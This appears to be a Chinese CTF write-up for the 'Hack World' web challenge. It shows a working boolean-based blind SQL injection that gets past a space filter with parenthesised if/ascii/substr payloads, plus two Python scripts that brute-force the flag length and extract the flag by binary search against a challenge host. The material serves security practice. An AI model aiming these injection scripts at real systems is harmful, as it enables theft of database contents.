[CISCN2019 华北赛区 Day2 Web1]Hack World

这个题呢，上来就把表名和列名都告诉了，就差查询了

发现输入1

 Hello, glzjin wants a girlfriend.

输入2

 Do you want to be my girlfriend?

而输入0

Error Occured When Fetch Result.

这就让我们想到布尔盲注，不过要使用if函数来判断是否符合

先查询长度，因为空格被过滤了，所以必须用括号代替了

import requests

url = "http://64b562ce-66ec-49db-9507-77e5cd05b9f2.node4.buuoj.cn:81/index.php"
len = 1;
while(True):
    data = {"id": f"if(length((select(flag)from(flag)))={len},1,0)"}
    r = requests.post(url,data=data)
    if('Hello, glzjin wants a girlfriend.' in r.text):
        break;
    print(len,end='\n')
    len += 1
print(f"flag长度为{len}")

运行一遍，得到flag长度为42

然后获取flag（水平太低代码可能写的不规范）

import requests
import time

url = "http://d2eaa69a-ae3a-4ad5-a1ac-b65ebe1da1bf.node4.buuoj.cn:81/"
flag = ''

for x in range(1,43):
    left = 33
    right = 126
    while(right > left):
        mid = int((left + right + 1) / 2)
        data = {'id':f"if(ascii(substr((select(flag)from(flag)),{x},1))>={mid},1,0)"}
        r = requests.post(url,data=data)
        if('Hello, glzjin wants a girlfriend.' in r.text):
            left = mid
        else:
            right = mid - 1
        time.sleep(0.1)
    flag += chr(right)
    print(flag)

print(f"flag为{flag}")

然后获得flag